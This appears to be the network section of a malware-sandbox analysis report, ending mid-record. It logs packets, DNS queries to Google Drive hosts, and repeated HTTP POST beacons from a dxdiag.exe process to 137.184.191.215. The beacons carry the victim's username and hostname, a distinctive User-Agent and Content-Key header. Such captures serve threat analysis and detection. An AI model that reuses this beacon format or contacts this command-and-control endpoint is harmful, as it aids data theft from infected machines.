                        Oct 1, 2024 07:47:01.080732107 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.080826998 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.080853939 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.080892086 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.085496902 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.085568905 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.085575104 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.085628986 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.091186047 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.091284990 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.091290951 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.091330051 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.098651886 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.098757982 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.098763943 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.098823071 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.104455948 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.104568958 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.104576111 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.104615927 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.108588934 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.108674049 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.116019964 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.116138935 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.116144896 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.116188049 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.135082006 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.135140896 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.135174036 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.135200024 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.135234118 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.135242939 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.135274887 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.135312080 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.135912895 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.135956049 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.135989904 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:58.090226889 CEST8049735137.184.191.215192.168.2.5
                        Oct 1, 2024 07:47:58.090306044 CEST4973580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.090342045 CEST4973580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.090369940 CEST8049735137.184.191.215192.168.2.5
                        Oct 1, 2024 07:47:58.090420008 CEST4973580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.090501070 CEST4973580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.237198114 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.242181063 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:47:58.242371082 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.244674921 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.249511003 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:47:58.249624014 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:47:58.254547119 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:00.870961905 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:00.870994091 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:00.871006966 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:00.871020079 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:00.871062994 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:00.871104002 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:00.871370077 CEST4973680192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:00.876142025 CEST8049736137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:01.021857977 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:01.026900053 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:01.027194023 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:01.029520035 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:01.034332991 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:01.034427881 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:01.039269924 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.631191015 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.631252050 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.631305933 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.631340027 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.631362915 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.631412983 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.631586075 CEST4973780192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.636329889 CEST8049737137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.769428968 CEST4973880192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.774435043 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.774528980 CEST4973880192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.777067900 CEST4973880192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.781924963 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:03.781970978 CEST4973880192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:03.786834955 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.419934034 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.419956923 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.419970989 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.419981956 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.420098066 CEST4973880192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:06.420401096 CEST4973880192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:06.425219059 CEST8049738137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.569649935 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:06.574744940 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.574843884 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:06.576972961 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:06.581847906 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:06.581937075 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:06.586754084 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.193640947 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.193661928 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.193677902 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.193691969 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.193754911 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.193963051 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.336150885 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.400151014 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.400213003 CEST4973980192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.401680946 CEST8049739137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.401695967 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.401788950 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.403965950 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.408762932 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:09.408894062 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:09.413665056 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.018668890 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.018691063 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.018702030 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.018887997 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.019071102 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.019159079 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.019690990 CEST4974080192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.024558067 CEST8049740137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.159779072 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.165086985 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.165215015 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.168895006 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.173800945 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:12.173913002 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:12.178770065 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.774228096 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.774250031 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.774265051 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.774288893 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.774318933 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.774353981 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.774595022 CEST4974180192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.779325962 CEST8049741137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.926727057 CEST4974280192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.931675911 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.931807041 CEST4974280192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.934040070 CEST4974280192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.938827038 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:14.938920975 CEST4974280192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:14.943777084 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.521382093 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.521401882 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.521411896 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.521420002 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.521559000 CEST4974280192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:17.521820068 CEST4974280192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:17.526628017 CEST8049742137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.663831949 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:17.668909073 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.669074059 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:17.671335936 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:17.676320076 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:17.676414967 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:17.681391001 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.266655922 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.266674042 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.266685963 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.266705036 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.266760111 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.266841888 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.267081022 CEST4974380192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.271833897 CEST8049743137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.410245895 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.415271997 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.415365934 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.417524099 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.422393084 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.422456026 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.427434921 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061018944 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061048985 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061062098 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061414957 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.061614990 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061656952 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.061789989 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.066528082 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.204612970 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.209523916 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.209592104 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.212361097 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.217187881 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.217240095 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.221973896 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861857891 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861875057 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861886978 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861897945 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861936092 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:25.861970901 CEST4974580192.168.2.5137.184.191.215
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 1, 2024 07:46:24.110692978 CEST | 60486 | 53 | 192.168.2.5 | 1.1.1.1
                        Oct 1, 2024 07:46:24.117572069 CEST | 53 | 60486 | 1.1.1.1 | 192.168.2.5
                        Oct 1, 2024 07:46:25.176707983 CEST | 55522 | 53 | 192.168.2.5 | 1.1.1.1
                        Oct 1, 2024 07:46:25.183461905 CEST | 53 | 55522 | 1.1.1.1 | 192.168.2.5
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Oct 1, 2024 07:46:24.110692978 CEST | 192.168.2.5 | 1.1.1.1 | 0x3a07 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                        Oct 1, 2024 07:46:25.176707983 CEST | 192.168.2.5 | 1.1.1.1 | 0x9719 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Oct 1, 2024 07:46:24.117572069 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a07 | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
                        Oct 1, 2024 07:46:25.183461905 CEST | 1.1.1.1 | 192.168.2.5 | 0x9719 | No error (0) | drive.usercontent.google.com | | 142.250.184.193 | A (IP address) | IN (0x0001) | false
                        • drive.google.com
                        • drive.usercontent.google.com
                        • 137.184.191.215
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49715 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:02.245306969 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 180
                        Connection: close
                        Oct 1, 2024 07:47:02.251203060 CEST | 180 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2CtEy1H
                        Oct 1, 2024 07:47:04.843025923 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:02 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:04.843049049 CEST | 224 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:04.843060017 CEST | 1236 | IN | Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:04.843070030 CEST | 142 | IN | Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:04.927290916 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 180
                        Connection: close
                        Oct 1, 2024 07:47:04.932136059 CEST | 180 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2CUTUQE
                        Oct 1, 2024 07:47:07.606863976 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:05 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:07.606890917 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:07.606904984 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:07.723172903 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:07.728143930 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:10.358056068 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:08 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:10.358074903 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:10.358084917 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
